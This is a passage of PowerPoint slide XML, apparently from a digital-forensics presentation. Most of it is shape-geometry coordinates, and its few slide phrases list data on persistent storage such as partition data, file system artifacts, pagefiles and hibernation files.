            <a:ext cx="6756400" cy="16675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Following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data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backed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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>up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45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>on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persistent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storage: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300">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="247650">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pP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Partition</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="247650">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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system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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>artifacts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97251" y="5028946"/>
            <a:ext cx="3157855" cy="1033144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ctr" marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100299"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="85"/>
              </a:spcBef>
            </a:pP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Cached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system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memory </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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data </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>(pagefiles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 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="11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hibernation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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>files)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475476" y="3843528"/>
            <a:ext cx="3447415" cy="3406140"/>
            <a:chOff x="6475476" y="3843528"/>
            <a:chExt cx="3447415" cy="3406140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="object 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6669786" y="4338066"/>
              <a:ext cx="2884805" cy="2884805"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2884804" h="2884804">
                  <a:moveTo>
                    <a:pt x="1443228" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1443228" y="2884678"/>
                  </a:lnTo>
                </a:path>
                <a:path w="2884804" h="2884804">
                  <a:moveTo>
                    <a:pt x="0" y="1441704"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2884678" y="1441704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464552" y="3843528"/>
              <a:ext cx="1531620" cy="946785"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1531620" h="946785">
                  <a:moveTo>
                    <a:pt x="1147318" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="382397" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="662432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142875" y="909701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174973" y="875039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209101" y="842313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245163" y="811624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283060" y="783074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322695" y="756763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363973" y="732792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406796" y="711263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451068" y="692276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496690" y="675934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543567" y="662336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591601" y="651583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="640696" y="643778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690754" y="639021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="741679" y="637413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="792257" y="639018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="841973" y="643769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="890734" y="651564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="938446" y="662306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="985016" y="675893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1030352" y="692228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1074359" y="711209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1116944" y="732738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1158015" y="756714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197478" y="783039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1235239" y="811613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1271207" y="842336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1305286" y="875108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1337384" y="909831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1367408" y="946404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1531620" y="662432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1147318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834884" y="4616196"/>
              <a:ext cx="748665" cy="749935"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="748665" h="749935">
                  <a:moveTo>
                    <a:pt x="374142" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="327211" y="2921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282019" y="11452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238918" y="25240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198257" y="43934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160388" y="67182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125660" y="94632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94426" y="125932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67034" y="160732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43837" y="198679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25184" y="239421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11426" y="282607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2915" y="327885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="374903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2915" y="421922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11426" y="467200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25184" y="510386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43837" y="551128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67034" y="589075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94426" y="623875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125660" y="655175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160388" y="682625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198257" y="705873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238918" y="724567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282019" y="738355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327211" y="746886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374142" y="749807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421072" y="746886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466264" y="738355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509365" y="724567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="550026" y="705873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587895" y="682625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622623" y="655175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653857" y="623875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681249" y="589075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704446" y="551128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723099" y="510386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736857" y="467200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745368" y="421922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748284" y="374903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745368" y="327885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736857" y="282607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723099" y="239421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704446" y="198679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681249" y="160732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653857" y="125932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622623" y="94632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587895" y="67182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="550026" y="43934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509365" y="25240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466264" y="11452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421072" y="2921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374142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443216" y="6304788"/>
              <a:ext cx="1533525" cy="944880"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1533525" h="944879">
                  <a:moveTo>
                    <a:pt x="1368805" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1338732" y="36596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306587" y="71339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1272464" y="104129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1236455" y="134867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1198654" y="163453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1159152" y="189788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1118043" y="213773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1075419" y="235308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1031374" y="254294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="985999" y="270632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="939389" y="284222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="891635" y="294965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="842831" y="302761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="793069" y="307512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="742441" y="309118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691462" y="307509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="641350" y="302746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592202" y="294927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544117" y="284147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="497191" y="270504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451523" y="254094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407209" y="235013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364347" y="213359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323035" y="189227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283370" y="162716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245449" y="133920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209370" y="102938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175231" y="69864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143128" y="34798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="282067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382777" y="944880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148460" y="944880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1533143" y="282067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1368805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815072" y="5751576"/>
              <a:ext cx="748665" cy="746760"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="748665" h="746760">
                  <a:moveTo>
                    <a:pt x="374142" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="327211" y="2908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282019" y="11401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238918" y="25128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198257" y="43740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160388" y="66887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125660" y="94220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94426" y="125389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67034" y="160044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43837" y="197836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25184" y="238415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11426" y="281432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2915" y="326536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="373380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2915" y="420223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11426" y="465327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25184" y="508344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43837" y="548923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67034" y="586715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94426" y="621370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125660" y="652539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160388" y="679872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198257" y="703019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238918" y="721631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282019" y="735358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327211" y="743851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374142" y="746760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421072" y="743851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466264" y="735358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509365" y="721631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="550026" y="703019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587895" y="679872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622623" y="652539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653857" y="621370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681249" y="586715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704446" y="548923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723099" y="508344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736857" y="465327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745368" y="420223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748283" y="373380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745368" y="326536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736857" y="281432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723099" y="238415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704446" y="197836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681249" y="160044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653857" y="125389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622623" y="94220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587895" y="66887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="550026" y="43740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509365" y="25128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466264" y="11401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421072" y="2908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374142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475476" y="4792980"/>
              <a:ext cx="946785" cy="1530350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="946784" h="1530350">
                  <a:moveTo>
                    <a:pt x="662431" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="382524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1147572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="662431" y="1530096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="909701" y="1387094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="874657" y="1354996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="841600" y="1320872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="810628" y="1284824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="781838" y="1246953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="755327" y="1207359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="731193" y="1166145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709533" y="1123410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690444" y="1079256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674025" y="1033784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="660373" y="987095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649585" y="939291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="641759" y="890472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="636991" y="840739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635380" y="790194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="636988" y="739568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="641747" y="689763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649561" y="640878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="660332" y="593014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673965" y="546269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690362" y="500743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709428" y="456536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="731065" y="413748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="755176" y="372477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="781666" y="332824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="810437" y="294888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="841393" y="258769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="874437" y="224565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="909473" y="192378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="946403" y="162306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="662431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246620" y="5161788"/>
              <a:ext cx="748665" cy="748665"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="748665" h="748664">
                  <a:moveTo>
                    <a:pt x="374141" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="327211" y="2915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282019" y="11426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238918" y="25184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198257" y="43837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160388" y="67034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125660" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94426" y="125660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67034" y="160388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43837" y="198257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25184" y="238918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11426" y="282019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2915" y="327211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="374141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2915" y="421072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11426" y="466264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25184" y="509365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43837" y="550026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67034" y="587895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94426" y="622623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125660" y="653857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160388" y="681249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198257" y="704446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238918" y="723099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282019" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327211" y="745368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374141" y="748284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421072" y="745368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466264" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509365" y="723099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="550026" y="704446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587895" y="681249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622623" y="653857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653857" y="622623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681249" y="587895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704446" y="550026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723099" y="509365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736857" y="466264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745368" y="421072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748283" y="374141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745368" y="327211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736857" y="282019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723099" y="238918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704446" y="198257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681249" y="160388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653857" y="125660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622623" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587895" y="67034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="550026" y="43837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509365" y="25184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466264" y="11426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421072" y="2915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374141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976360" y="4792980"/>
              <a:ext cx="946785" cy="1530350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="946784" h="1530350">
                  <a:moveTo>
                    <a:pt x="283972" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="162306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36930" y="192378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71966" y="224565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105010" y="258769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135966" y="294888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164737" y="332824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191227" y="372477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215338" y="413748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236975" y="456536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256041" y="500743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272438" y="546269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286071" y="593014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296842" y="640878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304656" y="689763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309415" y="739568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311023" y="790194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309412" y="840739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304644" y="890472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296818" y="939291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286030" y="987095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272378" y="1033784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255959" y="1079256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236870" y="1123410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215210" y="1166145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191076" y="1207359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164565" y="1246953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135775" y="1284824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104803" y="1320872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71746" y="1354996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36703" y="1387094"/>
                  </a:lnTo>
